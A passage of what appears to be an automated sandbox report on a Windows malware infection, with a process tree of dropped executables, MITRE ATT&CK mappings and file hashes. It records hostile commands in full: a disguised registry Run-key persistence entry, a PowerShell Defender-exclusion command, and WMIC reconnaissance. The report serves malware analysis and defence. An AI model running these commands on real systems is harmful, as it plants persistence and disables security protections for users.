  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\random.exe"
  2⤵
  PID:2016
- - C:\Users\Admin\AppData\Local\Temp\a\random.exe
    C:\Users\Admin\AppData\Local\Temp\a\random.exe
    3⤵
    PID:5776
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe"
  2⤵
  PID:648
- - C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe
    C:\Users\Admin\AppData\Local\Temp\a\syncUpd.exe
    3⤵
    PID:744
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 744 -s 1016
      4⤵
      Program crash
      PID:4300
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\PINNAC~1.EXE"
  2⤵
  PID:540
- - C:\Users\Admin\AppData\Local\Temp\a\PINNAC~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\PINNAC~1.EXE
    3⤵
    PID:5516
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\QUANTU~1.EXE"
  2⤵
  PID:5692
- - C:\Users\Admin\AppData\Local\Temp\a\QUANTU~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\QUANTU~1.EXE
    3⤵
    PID:5828
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\TEST_2~1.EXE"
  2⤵
  PID:3480
- - C:\Users\Admin\AppData\Local\Temp\a\TEST_2~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\TEST_2~1.EXE
    3⤵
    PID:3496
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\GOLDPR~1.EXE"
  2⤵
  PID:4888
- - C:\Users\Admin\AppData\Local\Temp\a\GOLDPR~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\GOLDPR~1.EXE
    3⤵
    PID:4180
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      4⤵
      PID:3648
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\juditttt.exe"
  2⤵
  PID:5320
- - C:\Users\Admin\AppData\Local\Temp\a\juditttt.exe
    C:\Users\Admin\AppData\Local\Temp\a\juditttt.exe
    3⤵
    PID:1348
  - - C:\Users\Admin\AppData\Local\Temp\onefile_1348_133543266153129385\stub.exe
      C:\Users\Admin\AppData\Local\Temp\a\juditttt.exe
      4⤵
      PID:2256
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:5440
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        5⤵
        
        PID:1988
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        6⤵
        Detects videocard installed
        
        PID:1616
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get Manufacturer"
        5⤵
        
        PID:4716
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get Manufacturer
        6⤵
        
        PID:5608
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "gdb --version"
        5⤵
        
        PID:5300
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:5800
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:5732
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path Win32_ComputerSystem get Manufacturer"
        5⤵
        
        PID:5136
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path Win32_ComputerSystem get Manufacturer
        6⤵
        
        PID:4424
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        5⤵
        
        PID:2540
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        6⤵
        
        PID:3744
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist"
        5⤵
        
        PID:3928
      - C:\Windows\system32\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        
        PID:5636
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\FATTHER.exe"
  2⤵
  PID:1524
- - C:\Users\Admin\AppData\Local\Temp\a\FATTHER.exe
    C:\Users\Admin\AppData\Local\Temp\a\FATTHER.exe
    3⤵
    PID:5540
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\GAMMA_~1.EXE"
  2⤵
  PID:1344
- - C:\Users\Admin\AppData\Local\Temp\a\GAMMA_~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\GAMMA_~1.EXE
    3⤵
    PID:2640
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\TRUECR~1.EXE"
  2⤵
  PID:1648
- - C:\Users\Admin\AppData\Local\Temp\a\TRUECR~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\TRUECR~1.EXE
    3⤵
    PID:4904
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
      4⤵
      PID:4984
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\ZENITH~1.EXE"
  2⤵
  PID:3568
- - C:\Users\Admin\AppData\Local\Temp\a\ZENITH~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\ZENITH~1.EXE
    3⤵
    PID:1720
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\seratwo.exe"
  2⤵
  PID:5516
- - C:\Users\Admin\AppData\Local\Temp\a\seratwo.exe
    C:\Users\Admin\AppData\Local\Temp\a\seratwo.exe
    3⤵
    PID:5592
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\USA123.exe"
  2⤵
  PID:1928
- - C:\Users\Admin\AppData\Local\Temp\a\USA123.exe
    C:\Users\Admin\AppData\Local\Temp\a\USA123.exe
    3⤵
    PID:224
  - - C:\Windows\svchost.com
      "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\a\USA123.exe /f
      4⤵
      PID:5668
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\a\USA123.exe /f
        5⤵
        
        PID:5532
      - C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ChromeUpdate /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\a\USA123.exe /f
        6⤵
        Modifies registry key
        
        PID:4740
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\SIGNED~1.EXE"
  2⤵
  PID:3636
- - C:\Users\Admin\AppData\Local\Temp\a\SIGNED~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\SIGNED~1.EXE
    3⤵
    PID:4856
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\APEX_V~1.EXE"
  2⤵
  PID:5196
- - C:\Users\Admin\AppData\Local\Temp\a\APEX_V~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\APEX_V~1.EXE
    3⤵
    PID:5564
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\RAPID_~1.EXE"
  2⤵
  PID:4792
- - C:\Users\Admin\AppData\Local\Temp\a\RAPID_~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\RAPID_~1.EXE
    3⤵
    PID:2904
- C:\Windows\svchost.com
  "C:\Windows\svchost.com" "C:\Users\Admin\AppData\Local\Temp\a\MIRACL~1.EXE"
  2⤵
  PID:5068
- - C:\Users\Admin\AppData\Local\Temp\a\MIRACL~1.EXE
    C:\Users\Admin\AppData\Local\Temp\a\MIRACL~1.EXE
    3⤵
    PID:4496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3808 -ip 3808
1⤵
PID:2464

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2632

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 212 -ip 212
1⤵
PID:5844

C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4316
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  PID:3752

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 1100 -ip 1100
1⤵
PID:5904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 744 -ip 744
1⤵
PID:1256

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:6092

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{edebb2c7-a838-4a4b-8a4b-79d83671dd67}
1⤵
PID:2296

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 624 -p 1720 -ip 1720
1⤵
PID:3000

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{12bdc290-8b1b-4ea2-8d17-458094203e70}
1⤵
PID:3240

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{71e49b11-a0f4-4d0a-8599-da7c6cfb32b5}
1⤵
PID:2904

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{59d22761-5d60-4190-827a-41d5d0d939d5}
1⤵
PID:5556

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{47a21010-c664-4c5c-94e6-73b1875446ae}
1⤵
PID:3132

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Are.docx

Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\WatchStep.txt

Filesize
449KB

MD5
923d2ece35acc082a885720fdf95933b

SHA1
12b895176428829f2dd3c91d8ec6dcb2da48108d

SHA256
2fa04514819035696b47e32d7a9d5195bc92a84f5b85ecb0ac62da6640626096

SHA512
7d0e3f1acac0edfe576b42d90c0e350bdb35bcb472ebf72f261f68286cd4048b248ceb0358dc4a4f86a7f6b004e5160409f8cafcba64823e8c4b9f2259b56936

Download Submit
C:\ProgramData\mozglue.dll

Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\nss3.dll

Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\ProgramData\nss3.dll

Filesize
1.5MB

MD5
acfdbd77ed9a514fe9f0a5dade4a7073

SHA1
79a06e99af3774ef3f9a21011e2f440f41a05962

SHA256
bb372fbb1f556be3a864a6642be80f429fa22bda4150f7ffb64c2cddcc721dc1

SHA512
d224722e9f4cb2052d6110d80878d028e90958a374f24efd8b56fdd933f59d5e324532c020232f471d8fd0c0009c021bbb0ce76946e25b418a7f94c672d92b58

Download Submit
C:\Users\Admin\AppData\Local\Cruise Mailer\cruisemailer.exe

Filesize
1.5MB

MD5
369c21d3d17e39e97784b1719c044959

SHA1
e208410798b0e5bccd12b54db91d09d8b2ce1e8e

SHA256
bda51c01d2025187c5cdefe3795e75f5458462e887d3f476429cea047fa728c6

SHA512
65bf6a215835bb89c6624d6a7daba2e1eb8582e7ca4f1c03b4c066f84c756113fef1fd21fe3155923d560b319c4c73a9eebf290dab68b016b287cb8976897e76

Download Submit
C:\Users\Admin\AppData\Local\Cruise Mailer\cruisemailer.exe

Filesize
1.6MB

MD5
93bcb34ff41fb9302a3dbf3f7a759ee2

SHA1
ad2ca7aa6f8f486675ab7dfff69623a88c67ca05

SHA256
24ae78f8f8979e1dff2d42757bd4c6de9f82e58e5f95758b469d47de28a5306e

SHA512
bd9ef77bf8cb6d953f99ad45cf399e2cccf0286c4c185a59b6008841f59f05088314c8370cd388079907105c9dbc4a49eb3267664657815973b36da552400c78

Download Submit
C:\Users\Admin\AppData\Local\Cruise Mailer\libbz2-1.dll

Filesize
103KB

MD5
0c6452935851b7cdb3a365aecd2dd260

SHA1
83ef3cd7f985acc113a6de364bdb376dbf8d2f48

SHA256
f8385d08bd44b213ff2a2c360fe01ae8a1eda5311c7e1fc1a043c524e899a8ed

SHA512
5ff21a85ee28665c4e707c7044f122d1bac8e408a06f8ea16e33a8c9201798d196fa65b24327f208c4ff415e24a5ad2414fe7a91d9c0b0d8cff88299111f2e1d

Download Submit
C:\Users\Admin\AppData\Local\Cruise Mailer\libgcc_s_dw2-1.dll

Filesize
122KB

MD5
6231b452e676ade27ca0ceb3a3cf874a

SHA1
f8236dbf9fa3b2835bbb5a8d08dab3a155f310d1

SHA256
9941eee1cafffad854ab2dfd49bf6e57b181efeb4e2d731ba7a28f5ab27e91cf

SHA512
f5882a3cded0a4e498519de5679ea12a0ea275c220e318af1762855a94bdac8dc5413d1c5d1a55a7cc31cfebcf4647dcf1f653195536ce1826a3002cf01aa12c

Download Submit
C:\Users\Admin\AppData\Local\Cruise Mailer\libogg-0.dll

Filesize
40KB

MD5
f47e78ad658b2767461ea926060bf3dd

SHA1
9ba8a1909864157fd12ddee8b94536cea04d8bd6

SHA256
602c2b9f796da7ba7bf877bf624ac790724800074d0e12ffa6861e29c1a38144

SHA512
216fa5aa6027c2896ea5c499638db7298dfe311d04e1abac302d6ce7f8d3ed4b9f4761fe2f4951f6f89716ca8104fa4ce3dfeccdbca77ed10638328d0f13546b

Download Submit
C:\Users\Admin\AppData\Local\Cruise Mailer\libvorbis-0.dll

Filesize
172KB

MD5
6896dc57d056879f929206a0a7692a34

SHA1
d2f709cde017c42916172e9178a17eb003917189

SHA256
8a7d2da7685cedb267bfa7f0ad3218afa28f4ed2f1029ee920d66eb398f3476d

SHA512
cd1a981d5281e8b2e6a8c27a57cdb65ed1498de21d2b7a62edc945fb380dea258f47a9ec9e53bd43d603297635edfca95ebcb2a962812cd53c310831242384b8

Download Submit
C:\Users\Admin\AppData\Local\Cruise Mailer\libwinpthread-1.dll

Filesize
66KB

MD5
f06b0761d27b9e69a8f1220846ff12af

SHA1
e3a2f4f12a5291ee8ddc7a185db2699bffadfe1a

SHA256
e85aecc40854203b4a2f4a0249f875673e881119181e3df2968491e31ad372a4

SHA512
5821ea0084524569e07bb18aa2999e3193c97aa52da6932a7971a61dd03d0f08ca9a2d4f98eb96a603b99f65171f6d495d3e8f2bbb2fc90469c741ef11b514e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
a774512b00820b61a51258335097b2c9

SHA1
38c28d1ea3907a1af6c0443255ab610dd9285095

SHA256
01946a2d65e59b66ebc256470ff4861f32edee90a44e31bf67529add95cafef4

SHA512
ce109be65060a5e7a872707c6c2ccce3aacd577e59c59d6e23e78d03e3d502f2707713fda40a546ed332e41a56ef90297af99590a5ab02f686a58bcbf3a82da1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
fd7944a4ff1be37517983ffaf5700b11

SHA1
c4287796d78e00969af85b7e16a2d04230961240

SHA256
b54b41e7ce5600bc653aa7c88abb666976872b2d5e2d657bfc1147a0b49e9d74

SHA512
28c58a2ccf39963a8d9f67ea5b93dbccf70b0109b2c8a396a58389cdec9db1205523a95730485bcbc9d533867cbf0e7167ad370fd45740e23656d01d96ee543b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
120B

MD5
df251d8d72f0f5dcf2fc693f7c1da9aa

SHA1
b05ffc787ebfe8cce30038acc7e9613ab5ded398

SHA256
30fdc46865b23461bb58189331a9dc845da8f2661a152d231f62a0d16db3ff9c

SHA512
87cdf268282c331b035d8ead5bf11b498dc7488213cb499a9ef109f57db3a5f633f10c6c7553d0d1126c963f6b50ed213faa58cefb905905314e50459192a62b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
181B

MD5
d0a97bc41bc1285ff64b00d38657ca90

SHA1
33bf3fa1f1abcc77310d22f4c58b50fdecf876db

SHA256
8a55cf19c2dabf89331990f3d5b3b51f8599e6bbb64969e94e1abd9dab4e8bca

SHA512
e48fca04844dba30749baaa3afd4761187219e07819bd84ff8b2d1a64da412e4f45b772a1640631e1eb216d6e4d780cd68fad4d3da47be7714f4b4d145a1586b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
4f58fd1017acb097ccd955480300de8f

SHA1
2bea5b201df4bbd0745821ca26274785fc0dc7ef

SHA256
289efcbaf96ac9ef891f5065525213f7fcd1cb4382d4c0d26c36a5dc4ce60a0e

SHA512
eb1ce297445971835abfc456488d20f9199ddc61ce1e8a5a259570e5974330cce54e875f7fe4834113f31f32f3a20c246c3f6f5933d758a166a1b9bcf0297cf8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
44fc9459d0875423f4f91bbfe5c5ae87

SHA1
395616b4e4b12b1aba3a55250913e00be9ca387c

SHA256
0fbce696d49f2aaf274737a95026a5d450a9fa8f8ca12150f1b12020e3f27ca3

SHA512
56a997c3ca7af5c4a075a73b721d78fbc13001f25f4a02417cc480956b32cad02c227f024124fc6f090095027a44d69905100ce94cb7189b3dd763af8e21375e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
7ee73db2baacb180eecaa6ffc28beb51

SHA1
20ac1a399f00e370483c57c0e1068906a4c26744

SHA256
45abdd2194329cc016f987a1a8885da87d57d74d63c4206f5d7fd4a7a32a29c0

SHA512
0ad78b0f5f88db0d59a76bdeac03ee8eb1b8b44efb118419a0127a29372e6e6344c79dee7afa9f026287a632f0c87e3c547f349d8ee61606d0db363cbc4fac2c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
0272b7c1e8db146de0a726ed78dbfa62

SHA1
4b207344458b9e8d7efae8c6ac47a85202b75eab

SHA256
ed7e6e3d5fdb8c968592b0a348c590174f4fd10c196bbafc30981ae0d995cef2

SHA512
92397ea5003a2ba6b46d07c20f198949d79943a1724c489506fade7c5afcbbc5fab6347ce7760e03a7fca5063ede7c26129bfd9dd82d2901c4b1ca6d5d4e8ab3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
b08eb513c928b7daa9338cbe0b040e9f

SHA1
b1b5bb52d6eeb76c6770d3dc92da90e77d57ce75

SHA256
6e7a8fd96b7d9f8351dcc76d706da2bda070b60c19337325af09e38dd453572a

SHA512
9bcee220fbe3b8e7480d42dfe71e50b2c1d66c28de8c9be5653c9e1c6637c1298e5e99a1673f49b555d687ad4faf710471fe61e0b3ee2e2fb7a70eaa2ef7fa3b

Download Submit
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

Filesize
1024KB

MD5
f786b5c7e69b6f6511904e73484dfd8f

SHA1
0773b664004f16e5523fa25e3fa969420362ee65

SHA256
2cbf627e6cc147e1e496e3a3cda15c66f2042903bf7f5412c3ea74ca423928e0

SHA512
662949961c987529451541f93b38495969a749d04a0d7a0c9ef28d59a801ec19ea25a1c22490225d78a549ac13a34eed9fbccb8ee1f0a03b3cc31d105589d966

Download Submit
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

Filesize
1.2MB

MD5
04bc9bcd59eb6b05732ac096947ce32d

SHA1
12b2f7a3bf3c06a0bc04329bc177639628c7cc3a

SHA256
468f8501ee96d6fafeba12c1df13c02dcea358a54abf52f314acb368fb326ab2

SHA512
49729338cdc210e27ecd0fbc358757f3d411d898d2da1f086d79484fb7d478fa6355fd36e5286382f384fcc30a31b5483548a8a3a97bea9746634a2c289468a0

Download Submit
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

Filesize
1.3MB

MD5
85a8d9a45398e9c9bce89981ee5a04f0

SHA1
5f45f288f17dd9b79f5cb8274c1f6a1469321a65

SHA256
90b6cc9536534dadf3477733edf525a3e68e9df73962ddabae2fec3e1c0d4be1

SHA512
6b97364439da137cfbf3ad3965fedacaea0f81256fc3f375577ecffe91f195e2da065d4197c04a94663d88ca1e2dd6818cc301618fa0a8e925c9fa8cc2760ef4

Download Submit
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe

Filesize
1.6MB

MD5
30ee5648277352eab90eb71338436fa5

SHA1
c91fbacaa212fef31277460536417892b6ecd75c

SHA256
c327c99920b21070b942e1ebf20d74ad18d524ba06a590be8488caa5d428f4b0

SHA512
2364c4f9f79c412dd5f05b6b6894f2763f3ea0a9732b68b7d12307909fd5064a1286225140da5b54b92fcb0f800105be55b2c6f8f1c816b3c4ecc57e14612c50

Download Submit
C:\Users\Admin\AppData\Local\Temp\3582-490\Vertex_Craze_20240225061753481.exe

Filesize
320KB

MD5
92e2a70a6f36f39457807c940d8f0e1f

SHA1
0b6e3e9eb30e7733a67e2963d1479116dc0111d9

SHA256
1ffdd9e65287f3b126f6d90458af2078d2c912f04ef382844793bc70b52b75a0

SHA512
c06999b37b609aa3efff9c181dd4769cd6724b19e24b61cbb9838afe67f8ae65352a6a8edcb6557b06d96a4e886372b87346c8ab47dbe10f57d0c13f94e86772

Download Submit
C:\Users\Admin\AppData\Local\Temp\FourthX.exe

Filesize
2.5MB

MD5
b03886cb64c04b828b6ec1b2487df4a4

SHA1
a7b9a99950429611931664950932f0e5525294a4

SHA256
5dfaa8987f5d0476b835140d8a24fb1d9402e390bbe92b8565da09581bd895fc

SHA512
21d1a5a4a218411c2ec29c9ca34ce321f6514e7ca3891eded8c3274aeb230051661a86eda373b9a006554e067de89d816aa1fa864acf0934bbb16a6034930659

Download Submit
C:\Users\Admin\AppData\Local\Temp\FourthX.exe

Filesize
896KB

MD5
716b6e79efee22fe3f3503a241a5eb8c

SHA1
94ddf83d37704bccf33929fb1c9cb9972375dfb6

SHA256
9a9e270e138b57ce4cac1c2d159ad093f200076721548f144a9c241dd3189b2c

SHA512
d7b2a61c3f964ac49bf09a91fb2a50ef8bcb242af1b3541e8f0af808936ac828780dfaf93329b3d38a165ce223579fdfe909c56f786e76d737a80f0d5925131a

Download Submit
C:\Users\Admin\AppData\Local\Temp\FourthX.exe

Filesize
1.3MB

MD5
d5ac8347ec7fe6b3267af60cf71255a7

SHA1
f8258729ec532f3161b0affd5082fbb5b194805d

SHA256
ee209b00280174cb7429c8540fd48f9fdee1634cdc26a6639b32af6f0cbc1c27

SHA512
7fc29e5305f71df670ad85ea59a7d30b89dbee5183fb4e5f670a7a7c17a0b0c4898177ac6e4d1d401dddf7c38e106f9ff1f5ca2f33a399009232bcb0a5b47296

Download Submit
C:\Users\Admin\AppData\Local\Temp\InstallSetup_four.exe

Filesize
319KB

MD5
e90d116eea923bb8daf8ff301b1f6c90

SHA1
602231a9ba516d0de14833f0a73b7f30014bd7fe

SHA256
306a6d0b41b29ca87da91ae5b94571546500c597479e4167ee538216a0ee52a4

SHA512
fbab2fbb674abf44162c0eb742eb695aa849c1b29eacfcd7b0e5856a433166ae762ef967765e35b48fbbf5f98038d20232223e0d292fe263304564e67f09705a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16402\python312.dll

Filesize
1.3MB

MD5
8dbd711792a064edf4538569b8ab4d35

SHA1
ad797cc762fbee4aa9f111e75ca1ba314670d76f

SHA256
a76710be1206e3c1cc8dff4a1814f85665c274dfe24e62da035c3ad917e3db6c

SHA512
28669275627cd0f9483ac0cebec1148963f0dac1529c596deb683975612e766c0744708a24e323b6a3a13e94c9694e643c1b883bbca4cf8eca63e01c3a0232db

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI16402\python312.dll

Filesize
576KB

MD5
0019882e32cecbf418b3d70cf21300d3

SHA1
112ead12f5df41dbb862821c8c524e979d3fd5ef

SHA256
09749f351de4dffba586ed0e3dae99be2d0395390048edb4851298f646a23322

SHA512
16c7b686b25820e97d426a6f9ddfd87f7235505092ab50c4e1a5563a36aaf273c7a03946ae02fd49a45a0f54773931bb2d2a1286b41911ff647285b6fd33af45

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nm3y0u2y.ddt.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\1.exe

Filesize
1.5MB

MD5
095a8cabcc9f69fdc5a73ef0a5455e7b

SHA1
2c4f3cef49238dfcb6005367a261503123f7269f

SHA256
6ca9324e1657af4465559015ce980cf9a4615630c5650ec13aefb67e0c7903eb

SHA512
5bcabc335ee667e49eff0d14504fc82b11bc5d93419497722aac106839bc4b904cc87f76c729e5edd71e21311db782b8e394c668db538e8f24237b52446c5f54

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\288c47bbc1871b439df19ff4df68f07666.exe

Filesize
6.9MB

MD5
065d82702dbfbdce50a499b9216bc125

SHA1
c9590ff09c33d4d7809f77c4ba93dabf830836c8

SHA256
5a9d092b47f39a805fb5f955f5885ff285346bc87d6bc366338f36ff400c9686

SHA512
8bb3c2f3dfc2453be4cecdd68d8fd8c637630bba286399435334603850bb34a5c50f1752f5a65439925c470ea3e4c124c1dab7b5d44e88974ee8300699fa2098

Download Submit
C:\Users\Admin\AppData\Local\Temp\a\288c47bbc1871b439df19ff4df68f07666.exe

Filesize
4.8MB

MD5
